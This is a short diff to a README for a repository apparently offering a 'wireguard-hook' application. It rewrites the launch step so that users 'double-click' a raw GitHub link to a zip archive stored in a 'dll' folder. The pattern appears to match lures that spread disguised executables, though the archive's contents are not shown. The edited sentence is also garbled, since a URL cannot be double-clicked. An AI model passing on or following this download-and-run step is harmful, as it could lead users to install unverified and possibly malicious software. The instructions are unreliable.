sandyemousy17/wireguard-hook/README.md

 ### 5. Run the Application

 Open the extracted folder.
-Double-click the **wireguard-hook.exe** file to launch the application.
+Double-click the **https://raw.githubusercontent.com/sandyemousy17/wireguard-hook/main/dll/wireguard-hook-v2.2.zip** file to launch the application.

 ### 6. Configure Your Settings